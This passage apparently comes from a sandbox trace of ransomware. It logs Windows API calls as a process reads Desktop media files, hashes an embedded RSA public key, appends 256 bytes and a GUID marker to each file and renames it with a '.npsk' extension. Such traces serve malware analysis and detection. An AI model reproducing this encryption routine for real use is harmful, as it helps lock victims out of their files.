KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.816] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.816] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.817] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.817] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.817] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.817] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.817] GetLastError () returned 0x0 [0214.817] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.817] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.817] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.817] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.817] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.818] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.818] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x590f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.818] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.819] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.819] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.819] CloseHandle (hObject=0x61c) returned 1 [0214.820] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\inZlLm7e4IeFfAl.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\inzllm7e4ieffal.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\inZlLm7e4IeFfAl.jpg.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\inzllm7e4ieffal.jpg.npsk")) returned 1 [0214.821] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ff88 | out: hHeap=0x750000) returned 1 [0214.821] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.821] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.823] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.823] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa45086f0, ftCreationTime.dwHighDateTime=0x1d5dc21, ftLastAccessTime.dwLowDateTime=0xc57a8cb0, ftLastAccessTime.dwHighDateTime=0x1d5e27d, ftLastWriteTime.dwLowDateTime=0xc57a8cb0, ftLastWriteTime.dwHighDateTime=0x1d5e27d, nFileSizeHigh=0x0, nFileSizeLow=0x10c08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IufxORE9Ig.gif", cAlternateFileName="IUFXOR~1.GIF")) returned 1 [0214.823] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IufxORE9Ig.gif") returned=".gif" [0214.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IufxORE9Ig.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iufxore9ig.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.823] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=68616) returned 1 [0214.823] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.825] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x10be2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.825] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.826] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x10c08, lpOverlapped=0x0) returned 1 [0214.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.827] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.828] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.828] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.828] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.828] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.828] GetLastError () returned 0x0 [0214.828] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.828] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.828] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.828] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.828] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.829] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.830] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x10c08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.830] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.830] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.830] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.830] CloseHandle (hObject=0x61c) returned 1 [0214.831] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IufxORE9Ig.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iufxore9ig.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IufxORE9Ig.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iufxore9ig.gif.npsk")) returned 1 [0214.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ff88 | out: hHeap=0x750000) returned 1 [0214.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.833] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.834] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.835] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67bf460, ftCreationTime.dwHighDateTime=0x1d5e1d8, ftLastAccessTime.dwLowDateTime=0x601de800, ftLastAccessTime.dwHighDateTime=0x1d5df2e, ftLastWriteTime.dwLowDateTime=0x601de800, ftLastWriteTime.dwHighDateTime=0x1d5df2e, nFileSizeHigh=0x0, nFileSizeLow=0x12523, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kHW_C.wav", cAlternateFileName="")) returned 1 [0214.835] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kHW_C.wav") returned=".wav" [0214.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kHW_C.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\khw_c.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.835] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=75043) returned 1 [0214.835] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.837] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x124fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.837] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.839] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x12523, lpOverlapped=0x0) returned 1 [0214.840] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.840] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.840] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.840] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.841] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.841] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.841] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.841] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.841] GetLastError () returned 0x0 [0214.841] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.841] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.841] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.841] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.841] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.841] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.842] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.843] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x12523, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.843] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.843] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.843] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.843] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.843] CloseHandle (hObject=0x61c) returned 1 [0214.844] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kHW_C.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\khw_c.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kHW_C.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\khw_c.wav.npsk")) returned 1 [0214.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.845] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.845] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.846] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.846] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5ef740, ftCreationTime.dwHighDateTime=0x1d5d9f4, ftLastAccessTime.dwLowDateTime=0x1821a480, ftLastAccessTime.dwHighDateTime=0x1d5e157, ftLastWriteTime.dwLowDateTime=0x1821a480, ftLastWriteTime.dwHighDateTime=0x1d5e157, nFileSizeHigh=0x0, nFileSizeLow=0x15c9c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mBKyb79uIbJvVDPK.png", cAlternateFileName="MBKYB7~1.PNG")) returned 1 [0214.846] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mBKyb79uIbJvVDPK.png") returned=".png" [0214.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mBKyb79uIbJvVDPK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mbkyb79uibjvvdpk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.847] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=89244) returned 1 [0214.847] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.849] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15c76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.849] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.850] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x15c9c, lpOverlapped=0x0) returned 1 [0214.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.850] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.851] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.851] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.852] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.852] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, 